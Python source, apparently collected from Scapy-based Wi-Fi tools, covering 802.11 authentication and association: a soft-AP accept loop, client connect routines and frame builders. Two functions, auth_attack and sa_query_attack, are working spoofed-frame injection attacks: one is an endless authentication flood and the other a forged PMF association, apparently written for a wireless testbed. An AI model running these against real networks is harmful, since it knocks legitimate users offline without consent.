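def accept(self):
    """Block until one queued station has authenticated and associated.

    Called after listen(); may be (and usually is) called many times. On the
    first call it starts the ClientListener thread, which answers probe
    requests and queues the MAC of every station that tries to join. Each
    call then pops one queued MAC, plays the AP side of the Open System
    authentication exchange, waits for the station's Association Request and
    answers it with ``self.asso_resp_data``.

    The returned WirelessStateMachine is pre-configured for that station and
    carries a ``clientDescriptor`` attribute (a WirelessClient describing it).
    The Dot11 Authentication / Association frames are exchanged inside this
    call, so the calling thread blocks. Stations queued by the listener while
    nobody is inside accept() may be lost if they time out first.

    Returns:
        ``(sockObj, clientMAC)`` once a station has associated, or ``None``
        when shutdown is requested before that happens.
    """
    # stdlib queue module; spelled Queue on Python 2.
    try:
        import queue
    except ImportError:  # pragma: no cover
        import Queue as queue

    if self.__shutdown__:
        return
    if not hasattr(self, 'client_listener'):
        self.client_listener = ClientListener(self.interface, self.backlog, self.essid, self.bssid)
        self.client_listener.setPrivacy(self.privacy)
        self.client_listener.start()
    while not self.__shutdown__:
        # Blocking get with a 1s timeout instead of spinning on empty(): the
        # busy-wait burned a core while idle, and a get() that raced another
        # consumer would have raised an uncaught queue.Empty.
        try:
            clientMAC = self.client_listener.client_queue.get(True, 1)
        except queue.Empty:
            continue
        sockObj = WirelessStateMachine(self.interface, self.bssid, self.source_mac, clientMAC)
        sockObj.clientDescriptor = WirelessClient(self.bssid, clientMAC)
        # Open System authentication: send the AP half (seqnum 2) and keep
        # answering while the station retries its request.
        sockObj.send(Dot11Auth(seqnum=2), 0, 11, 0, True)
        for _ in range(self.max_tries):
            data = sockObj.recv()
            if not data:
                continue
            if data.haslayer('Dot11AssoReq'):
                break
            elif data.haslayer(Dot11Auth):
                sockObj.send(Dot11Auth(seqnum=2), 0, 11, 0, True)
        else:
            # No Association Request within max_tries: the station never
            # associated, so do not hand back a state machine that claims it
            # did; drop it and service the next queued client instead.
            continue
        sockObj.send(self.asso_resp_data, 0, 1, 0x10, True)
        return sockObj, clientMAC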
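def auth_attack(interface, sta, ap, interval=0.3, count=None):
    """Flood ``ap`` with Open System authentication requests spoofed from ``sta``.

    Every frame is addressed to ``ap.bssid`` with ``sta.mac_addr`` as the
    transmitter, and the 802.11 sequence number is advanced between frames so
    the receiver does not collapse them as retransmissions.

    Args:
        interface: object exposing ``inject(pkt)``.
        sta: station descriptor providing ``mac_addr`` (the spoofed source).
        ap: access point descriptor providing ``bssid``.
        interval: seconds to sleep between frames (0.3, as before).
        count: number of frames to send; ``None`` (the default) loops forever,
            which is the original behaviour.
    """
    pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
        Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
    sent = 0
    while count is None or sent < count:
        cprint("ZZZ", 'blue')  # debug trace kept from the original
        interface.inject(pkt)
        # Dot11.SC packs the fragment number in bits 0-3 and the sequence
        # number in bits 4-15. Adding 1 only bumped the fragment number, so
        # every frame looked like a further fragment of sequence 0; step the
        # sequence field instead and wrap within the 16-bit field.
        pkt.SC = (pkt.SC + 0x10) & 0xFFFF
        sent += 1
        sleep(interval)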
def send_auth_response(self, pkt):
    """Answer a station's authentication request with the AP half (seqnum 2).

    Remembers the requesting station (``pkt.addr2``) in ``self.client``,
    starts the DHCP server, and sends back a Dot11Auth frame that echoes the
    request's ``algo`` and ``status`` fields.

    NOTE(review): any station that sends an Auth frame is accepted here, and
    ``status`` is copied from the request rather than set to 0 (success) --
    confirm that is the intended contract.
    """
    station = pkt.addr2
    self.client = station
    log_runtime.warning("Client %s connected!", station)
    # DHCP comes up as soon as a station authenticates.
    self.dhcp_server.run()
    request = pkt[Dot11Auth]
    header = Dot11(addr1=station, addr2=self.mac, addr3=self.mac)
    body = Dot11Auth(seqnum=2, algo=request.algo, status=request.status)
    self.send(RadioTap() / header / body)
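def sa_query_attack(interface, ap, sta, essid="Wireless Attack Testbed"):
    """Inject a spoofed Authentication + Association Request on behalf of ``sta``.

    The association request advertises CCMP / PSK and sets the MFPC bit in the
    RSN capabilities, i.e. it looks like a PMF-capable station re-joining.

    Args:
        interface: object exposing ``inject(pkt)``.
        ap: access point descriptor providing ``bssid``.
        sta: station descriptor providing ``mac_addr`` (the spoofed source).
        essid: SSID element placed in the association request; the default is
            the value that used to be hard-coded.
    """
    auth = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
        Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
    interface.inject(auth)

    rsn_info = (
        '\x01\x00'          # RSN version 1
        '\x00\x0f\xac\x04'  # group cipher suite: 00-0f-ac:4 (CCMP)
        '\x01\x00'          # pairwise cipher suite count: 1
        '\x00\x0f\xac\x04'  # pairwise cipher suite: CCMP
        '\x01\x00'          # AKM suite count: 1
        '\x00\x0f\xac\x02'  # AKM suite: 00-0f-ac:2 (PSK)
        '\x80\x00')         # RSN capabilities (little-endian 0x0080): MFPC set
    assoc = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
        Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info=essid) / \
        Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=rsn_info)
    interface.inject(assoc)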
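def connect(self, essid, rsnInfo=''):
    """Connect/Associate with an access point.

    Runs the Open System authentication exchange and then sends an
    Association Request for ``essid``. ``rsnInfo`` is appended verbatim to
    the association request: leave it ``''`` to send no RSN element, or pass
    ``None`` to fetch it via ``get_rsn_information()`` first.

    errDict = {
        -1:"Already Connected",
        0:"No Error",
        1:"Failed To Get Probe Response",
        2:"Failed To Get Authentication Response",
        3:"Failed To Get Association Response",
        4:"Authentication Request Received Fail Response",
        5:"Association Request Received Fail Response"
    }
    (-1 and 1 are listed for parity with the table; this implementation does
    not currently return them.)
    """
    # Resolve the RSN element *before* the authentication exchange, as the
    # sibling sendp/sniff implementation does. Fetching it afterwards let
    # whatever get_rsn_information() does to self.lastpacket clobber the
    # Auth response that the Dot11Auth checks below rely on.
    if rsnInfo is None:  # None explicitly means go get it, leave it '' to proceed with out it
        rsnInfo = self.get_rsn_information(essid)

    # Dot11 Authentication Request (Open System, seqnum 1)
    payload = (RadioTap() / Dot11(
        addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) / Dot11Auth(seqnum=1))
    self.__thread_sendp__(payload)
    if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
        return 2
    if self.lastpacket.getlayer(Dot11Auth).status != 0:
        return 4

    # Dot11 Association Request
    payload = (RadioTap() / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid,
                                  SC=self.__fixSC__(), subtype=0)
               / Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)
               / Dot11Elt(ID=0, info=essid)
               / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')
               / Dot11Elt(ID=50, info='\x0c\x12\x18\x60')
               / rsnInfo)
    self.__thread_sendp__(payload)
    if self.lastpacket is None or not self.lastpacket.haslayer(Dot11AssoResp):
        return 3
    if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
        return 5
    self.connected = True
    self.sequence = 0
    return 0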
def connect(self, essid, rsnInfo=''):
    """Connect/Associate with an access point.

    Sends the Open System authentication request and then the association
    request for ``essid`` on ``self.interface``, sniffing after each for the
    reply that ``__stopfilter__`` stores in ``self.lastpacket``. ``rsnInfo``
    is appended as-is to the association request; ``''`` omits it and
    ``None`` fetches it through ``getRSNInformation()``.

    errDict = {
        -1:"Already Connected",
        0:"No Error",
        1:"Failed To Get Probe Response",
        2:"Failed To Get Authentication Response",
        3:"Failed To Get Association Response",
        4:"Authentication Request Received Fail Response",
        5:"Association Request Received Fail Response"
    }
    """
    def exchange(frame):
        # Transmit one management frame, bump our sequence counter and wait
        # up to self.timeout for __stopfilter__ to capture the reply.
        sendp(frame, iface=self.interface, verbose=False)
        self.sequence += 1
        sniff(iface=self.interface, store=0, timeout=self.timeout,
              stop_filter=self.__stopfilter__)

    if rsnInfo is None:  # None explicitly means go get it, leave it '' to proceed with out it
        rsnInfo = self.getRSNInformation(essid)

    # Dot11 Authentication Request
    auth_req = (RadioTap()
                / Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid,
                        SC=self.__unfuckupSC__())
                / Dot11Auth(seqnum=1))
    exchange(auth_req)
    reply = self.lastpacket
    if reply is None or not reply.haslayer('Dot11Auth'):
        return 2
    if reply.getlayer('Dot11Auth').status != 0:
        return 4

    # Dot11 Association Request
    asso_req = (RadioTap()
                / Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid,
                        SC=self.__unfuckupSC__(), subtype=0)
                / Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)
                / Dot11Elt(ID=0, info=essid)
                / Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')
                / Dot11Elt(ID=50, info='\x0c\x12\x18\x60')
                / rsnInfo)
    exchange(asso_req)
    reply = self.lastpacket
    if reply is None or not reply.haslayer(Dot11AssoResp):
        return 3
    if reply.getlayer(Dot11AssoResp).status != 0:
        return 5

    self.connected = True
    self.sequence = 0  # reset it
    return 0
def auth_frame_blueprint(self, ap, cl):
    """Return a template authentication request (seqnum 1) from station ``cl`` to AP ``ap``.

    ``ap`` is used for both the receiver address and the BSSID (addr3).
    """
    header = Dot11(addr1=ap, addr2=cl, addr3=ap)
    body = Dot11Auth(seqnum=1)
    return RadioTap() / header / body